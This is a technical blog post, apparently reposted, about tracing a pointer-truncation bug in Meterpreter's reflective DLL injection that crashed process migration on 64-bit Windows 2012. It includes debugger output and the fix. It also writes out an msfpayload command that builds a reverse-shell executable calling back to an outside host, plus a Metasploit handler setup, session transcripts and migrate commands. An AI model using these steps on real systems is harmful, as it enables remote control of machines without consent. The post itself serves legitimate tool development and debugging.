processes, upload files, and you can even use it as a pivot-point for launching attacks against other non-routable hosts. While the power of all this is enough to bake anyone’s noodle, the thing that blows my mind the most is Meterpreter’s ability to migrate to other processes. That is, Meterpreter can dynamically load itself into another processes and then reconnect to your Metasploit session seamlessly without any effort from the attacker (ie. you). Simply executing migrate <process id> at the Meterpreter prompt is all it takes. There are some caveats when it comes to migration. In particular, you need to have permission to write to the target process’s memory otherwise the migration will not succeed. Meterpreter comes in quite a few flavours, including PHP, Python, and native/C for Linux and Windows. Some implementations are more feature-rich than others, but they all have common functionality which makes it easy to perform a variety of functions on a compromised host. We’ll be focusing on the Windows native payload in this post, and in particular we’ll be looking at how Meterpreter is loaded and executed. Reflective DLL Injection Simply put, Reflective DLL Injection is a method for injection a DLL into a process. No surprises there. However, it has some nifty properties that make a great candidate for use in tools such as Meterpreter. Some of those points include: Position-independence. Lack of host system registration. Largely undetectable on the target at both a system and process level. The canonical paper [PDF], written by Stephen Fewer, is well worth reading and can be found on the Harmony Security website. Read it. It’s amazing, and does a much better job of explaining itself than I could ever hope to. I would like to point out that there’s a multi-stage process involved which includes: Writing the code to an executable area of memory. Executing the loader which creates a valid DLL image in memory. Calling DllMain on the loaded DLL. Returning control to the process that invoked it. With that in mind, let’s take a look at the bug. The Bug The bug that was reported related to process migration, and went something like this (paraphrased slightly with a bit more information): Trying to migrate Metepreter between processes on Windows 2012 seems to be unreliable. It will migrate just fine into some processes, such as explorer.exe, without any problems. However, spawning another process, such as notepad.exe, and migrating to it hangs the entire session. Migrating to the winlogon.exe process crashes the entire user environment on the target host. When I first read this report I thought “Wow, how am I going to track this down?”, and I’ll admit that I was a little intimidated at first, especially given that I knew that the native Windows Meterpreter was using Reflective DLL Injection to load itself into other processes. However, it’s been a long time since I’d been tasked with something this challenging and so, deep down, I was looking forward to diving in. Replication The first step was to fire up a Windows 2012 virtual machine and replicate the problem. Windows 2012 only comes in a 64-bit flavour, so picking the right version wasn’t a problem. After installation, I needed to simulate an attack coming from Metasploit so that I could interact with Meterpreter to perform the migration. Creating a payload to do this is really simple thanks to msfpayload (part of Metasploit). On my Backtrack VM I used the following command to generate the PE image: root@bt:~# msfpayload windows/x64/meterpreter/reverse_tcp LHOST=10.5.26.40 LPORT=443 X > 40-443-x64.exe This command creates a 64-bit Windows executable that contains a small stager. This stager connects to 10.5.26.40 (my Backtrack VM) on port 443 (I always choose the HTTPS port to avoid potential outbound firewall issues). Once connected it will download the Meterpreter payload and establish a session with Metasploit. I copied this binary to the Windows 2012 machine ready to execute. At this point, Metasploit needs to be set up and configured to deal with the incoming request. On the Backtrack VM, we run msfconsole and set it up to use multi/handler with the appropriate settings, like so: msf exploit(handler) > show options Module options (exploit/multi/handler): Name Current Setting Required Description ---- --------------- -------- ----------- Payload options (windows/x64/meterpreter/reverse_tcp): Name Current Setting Required Description ---- --------------- -------- ----------- EXITFUNC process yes Exit technique: seh, thread, process, none LHOST 10.5.26.40 yes The listen address LPORT 443 yes The listen port Exploit target: Id Name -- ---- 0 Wildcard Target With those settings in place, the exploit was ready to fire: msf exploit(handler) > exploit [*] Started reverse handler on 10.5.26.40:443 [*] Starting the payload handler... From the Windows 2012 VM I ran the exploit binary and my Metepreter session kicked off: [*] Sending stage (951296 bytes) to 10.5.26.30 [*] Meterpreter session 1 opened (10.5.26.40:443 -> 10.5.26.30:38516) at 2013-09-11 21:55:52 +1000 meterpreter > getuid Server username: WIN-URCAUVPE291\OJ Reeves meterpreter > sysinfo Computer : WIN-URCAUVPE291 OS : Windows 2012 (Build 9200). Architecture : x64 System Language : en_US Meterpreter : x64/win64 meterpreter > Before trying the failure case, I wanted to make sure that the known success case worked locally first. I decided to migrate to explorer.exe and see if anything changed: meterpreter > ps Process List ============ PID PPID Name Arch Session User Path --- ---- ---- ---- ------- ---- ---- 0 0 [System Process] 4294967295 4 0 System 4294967295 444 4 smss.exe 4294967295 484 708 svchost.exe 4294967295 536 524 csrss.exe 4294967295 604 596 csrss.exe 4294967295 612 524 wininit.exe 4294967295 640 596 winlogon.exe 4294967295 692 720 explorer.exe x86_64 1 WIN-URCAUVPE291\OJ Reeves C:\Windows\Explorer.EXE 708 612 services.exe 4294967295 716 612 lsass.exe 4294967295 804 708 svchost.exe 4294967295 816 708 svchost.exe 4294967295 ... snip ... meterpreter > migrate 692 [*] Migrating from 1508 to 692... [*] Migration completed successfully. meterpreter > getuid Server username: WIN-URCAUVPE291\OJ Reeves meterpreter > sysinfo Computer : WIN-URCAUVPE291 OS : Windows 2012 (Build 9200). Architecture : x64 System Language : en_US Meterpreter : x64/win64 meterpreter > Migration seemed to work. Next I tried the failure case. First I launched notepad.exe and then attempted to migrate to it: meterpreter > execute -f notepad.exe -t -H Process 192 created. meterpreter > migrate 192 [*] Migrating from 692 to 192... [-] Error running command migrate: Rex::RuntimeError No response was received to the core_loadlib request. meterpreter > The session hung at this point and no Meterpreter commands would work. When I went over to the Windows 2012 VM I saw that there was a notification that the notepad.exe process had crashed. This was great as I was able to reproduce the failure. It was time to investigate the problem. Diagnosis To help figure out what was going wrong, I enlisted the help of two of my favourite tools: DebugView and Windbg. Coverage of these tools is beyond the scope of the article, so if you want to learn more about them you’ll find a stack of information out on the web. Given that this machine was 64-bit and the process we were aiming to debug was 64-bit, I installed the 64-bit version of the Debugging Tools for Windows so that the right version of windbg was available. Before dabbling with any of the binaries and adding debug detail, I repeated the failure scenario but with one small change: I launched notepad.exe manually and attached to it from windbg prior to performing the migration. I left DebugView running as well to catch any debug messages from processes outside of the one that windbg was attached to. Upon running the migrate command notepad.exe crashed and windbg caught the exception. This is what it showed: (ab0.448): Access violation - code c0000005 (first chance) First chance exceptions are reported before any exception handling. This exception may be expected and handled. 00000000`707a7b5c ?? ??? We can see that we’re accessing memory that we shouldn’t be accessing. But why? 0:003> !analyze -v ******************************************************************************* * * * Exception Analysis * * * ******************************************************************************* FAULTING_IP: unknown!printable+0 00000000`707a7b5c ?? ??? EXCEPTION_RECORD: ffffffffffffffff -- (.exr 0xffffffffffffffff) ExceptionAddress: 00000000707a7b5c ExceptionCode: c0000005 (Access violation) ExceptionFlags: 00000000 NumberParameters: 2 Parameter[0]: 0000000000000008 Parameter[1]: 00000000707a7b5c Attempt to execute non-executable address 00000000707a7b5c ... snip ... The migration process results in an attempt to execute a section of code in an area of memory that isn’t marked as executable. Let’s confirm that: 0:003> !vprot 00000000707a7b5c BaseAddress: 00000000707a7000 AllocationBase: 0000000000000000 RegionSize: 000000000f839000 State: 00010000 MEM_FREE Protect: 00000001 PAGE_NOACCESS As we can see the memory area is definitely not marked as executable. But should it be? Should this memory be executable, or are we just pointing to an invalid area of memory? If it was the former, then it might imply that DEP or ASLR are somehow interfering. However, my gut feeling was that it was the latter. A quick look at the contents of the memory at this location would be enough to confirm: 0:003> du 00000000707a7b5c 00000000`707a7b5c "????????????????????????????????" 00000000`707a7b9c "????????????????????????????????" 00000000`707a7bdc "????????????????????????????????" 00000000`707a7c1c "????????????????????????????????" 00000000`707a7c5c "????????????????????????????????" 00000000`707a7c9c "????????????????????????????????" 00000000`707a7cdc "????????????????????????????????" 00000000`707a7d1c "????????????????????????????????" 00000000`707a7d5c "????????????????????????????????" 00000000`707a7d9c "????????????????????????????????" 00000000`707a7ddc "????????????????????????????????" 00000000`707a7e1c "????????????????????????????????" It’s pretty clear that no valid code is located in this area of memory. This implied that there was a possibility that a pointer to an area of code is somehow going awry. But where? To find this out, I needed to add some more debug output to Meterpreter. Next, I opened the Meterpreter source in Visual Studio 2012 (freshly moved from VS 2010 by yours truly) and prepared to rebuild the binaries with some extra debug output. I littered the code with OutputDebugString calls at various key locations, enabled the existing logging that was built into the source, and rebuilt the suite of binaries from scratch. Once built, I deployed them to my Backtrack VM, fired up DebugView on the Windows 2012 VM and repeated the process (including attaching to notepad.exe with windbg). Here’s a snippet of the output: [SERVER] Initializing... [SERVER] module loaded at 0x350B0000 [SERVER] main server thread: handle=0x00000138 id=0x000008F0 sigterm=0x334D7B20 [SERVER] Using SSL transport... [SERVER] Initializing tokens... [SERVER] Flushing the socket handle... [SERVER] Initializing SSL... [SERVER] Negotiating SSL... ModLoad: 000007ff`58060000 000007ff`58075000 C:\Windows\system32\NETAPI32.DLL ModLoad: 000007ff`586d0000 000007ff`586de000 C:\Windows\system32\netutils.dll ModLoad: 000007ff`5b020000 000007ff`5b044000 C:\Windows\system32\srvcli.dll ModLoad: 000007ff`58020000 000007ff`58035000 C:\Windows\system32\wkscli.dll ModLoad: 000007ff`5ad10000 000007ff`5ad2a000 C:\Windows\system32\CRYPTSP.dll ModLoad: 000007ff`5a990000 000007ff`5a9d9000 C:\Windows\system32\rsaenh.dll [SERVER] Sending a HTTP GET request to the remote side... [SERVER] Completed writing the HTTP GET request: 27 [SERVER] Registering dispatch routines... Registering a new command (core_loadlib)... Allocated memory... Setting new command... Fixing next/prev... Done... [SERVER] Entering the main server dispatch loop for transport 0... [DISPATCH] entering server_dispatch( 0x334D7B60 ) [SCHEDULER] entering scheduler_initialize. [SCHEDULER] leaving scheduler_initialize. [DISPATCH] created command_process_thread 0x33523030, handle=0x000001F0 [COMMAND] Processing method core_loadlib [COMMAND] core_loadlib: Entry [COMMAND] core_loadlib: libraryPath (ext264209.x64.dll) flags (2) [COMMAND] core_loadlib: lib does not exist locally (being uploaded) [COMMAND] core_loadlib: lib is not to be stored on disk [LOADLIBRARYR] starting [LOADLIBRARYR] GetReflectiveLoaderOffset [LOADLIBRARYR] GetReflectiveLoaderOffset (5488) [LOADLIBRARYR] Calling VirtualProtect lpBuffer (0000008935318B20) length (428544) [LOADLIBRARYR] Calling pReflectiveLoader (000000893531A090) ModLoad: 000007ff`555e0000 000007ff`55600000 C:\Windows\system32\WINMM.dll ModLoad: 000007ff`555a0000 000007ff`555d2000 C:\Windows\system32\WINMMBASE.dll ModLoad: 000007ff`57e00000 000007ff`57e2c000 C:\Windows\system32\IPHLPAPI.DLL ModLoad: 000007ff`57de0000 000007ff`57dea000 C:\Windows\system32\WINNSI.DLL [LOADLIBRARYR] Calling pDllMain (0000000033449BEC) (9b8.968): Access violation - code c0000005 (first chance) First chance exceptions are reported before any exception handling. This exception may be expected and handled. 00000000`33449bec ?? ??? The extra debug calls that I added to the source are those marked with [LOADLIBRARYR]. These calls were located in the guts of the reflective DLL injection code. As we already know from earlier in this post, the reflective DLL injection code dynamically builds a valid DLL image in memory and then invokes it. The method which builds this DLL image is called ReflectiveLoader() and is invoked in code via a pointer called pReflectiveLoader, which you can see in the above output. At the end of the ReflectiveLoader() function, a reference to DllMain() is resolved and invoked directly prior to returning control to the caller. Once this function returns, the Meterpreter-specific code then calls DllMain() again, using the value returned from ReflectiveLoader(), to invoke some functionality required by the Metasploit framework. In the above output, you can see the pointer to DllMain() called pDllMain, and this is the pointer that’s used to make the call. What was interesting about the log is that the first call to DllMain() that is invoked in the body of ReflectiveLoader() worked fine, otherwise the process would have crashed prior to the line that outputs the value of the pDllMain variable. Instead, it was the second call to DllMain() via the pDllMain pointer that caused the crash. This implied that the memory address that was being returned from ReflectiveLoader() was incorrect. The nature of the reflective loading mechanism implied to me that the addresses of pReflectiveLoader and pDllMain should actually be quite close together in memory. However, focussing on a small part of the output, I noticed the following: [LOADLIBRARYR] Calling pReflectiveLoader (000000893531A090) [LOADLIBRARYR] Calling pDllMain (0000000033449BEC) Those two pointers were nowhere near each other! The more perceptive of you will have noticed that the pDllMain pointer appeared to have lost its higher-order DWORD. The pointer had in fact been truncated! But why? It wasn’t immediately obvious to me what the reason was, but I was keen to validate that this was the case. To prove my theory, I hacked the code a little so that the higher-order DWORD of the pReflectiveLoader value was used as the higher-order DWORD of pDllMain as well. The hack looked something like this: ULONG_PTR ulReflectiveLoaderBase = ((ULONG_PTR)pReflectiveLoader) & (((ULONG_PTR)-1) ^ (0xFFFFFFFF)); pDllMain = (DLLMAIN)(pReflectiveLoader() | ulReflectiveLoaderBase); After the above code, pDllMain would have the same higher-order DWORD value as pReflectiveLoader. I compiled, deployed, executed … … and it worked! Resolution Armed with the knowledge earned from the above diagnosis, I set about looking through the code to see why this pointer was being truncated. Clearly the value was perfectly fine prior to being returned from ReflectiveLoader(), so why was it truncated upon return? I spent quite a bit of time looking around, and I didn’t find anything. Nothing was leaping out at me. I felt really stupid. So instead of beating about the bush, I contacted the man himself, the author and creator of Reflective DLL Injection himself, Mr Stephen Fewer. I explained the situation to him, detailed my findings and asked if he any idea as to why this problem might be occurring. It didn’t take long to get a response. Stephen jumped on the issue straight away, fixed it and submitted a pull request to the Meterpreter repository before emailing me back with details of the solution. Talk about great service! When I saw the solution I immediately felt stupid for missing it myself. In hindsight I should have known to look in this location. I ate some humble pie and savoured the taste while expressing my gratitude to Stephen for his prompt response. So what was it? The pReflectiveLoader pointer is a function pointer of a type defined like so: typedef DWORD (WINAPI * REFLECTIVELOADER)( VOID ); However, the ReflectiveLoader() function was defined in the source like so: #ifdef REFLECTIVEDLLINJECTION_VIA_LOADREMOTELIBRARYR DLLEXPORT ULONG_PTR WINAPI ReflectiveLoader( LPVOID lpParameter ) #else DLLEXPORT ULONG_PTR WINAPI ReflectiveLoader( VOID ) #endif { // ... snip ... } So the function returns a ULONG_PTR (which is 64-bits) but the function pointer type returned a DWORD (which is 32-bits). This is what was causing the truncation of the pointer and effectively zeroing out the higher-order DWORD of pDllMain. The fix was to simply change the return type of the function pointer to match: typedef ULONG_PTR (WINAPI * REFLECTIVELOADER)( VOID ); Problem solved. Extra Thoughts and Conclusion For those of you who are wondering, like I was, why this was an intermittent problem the answer lies in the fact that the new versions of Windows have newer versions of ASLR. To quote Stephen: The bug was triggering on Server 2012 but not other 64bit systems probably due to high entropy ASLR making allocations over the 4gig boundary. Earlier versions of Windows didn’t have an ASLR implementation that resulted in memory allocations over the 4GB boundary. As a result, the higher-order DWORD was always zero anyway, which meant that the truncation had no impact. This was a really fun bug to analyse and track down. I’m glad we got to the bottom of it. Again I’d like to thank Stephen for his involvement in locating the source of the problem. The new and improved version of Meterpreter that contains this fix will be landing in Metasploit very soon (I hope). Thanks for reading. Comments and feedback are welcomed. Sursa: 64bit Pointer Truncation in Meterpreter - OJ's perspective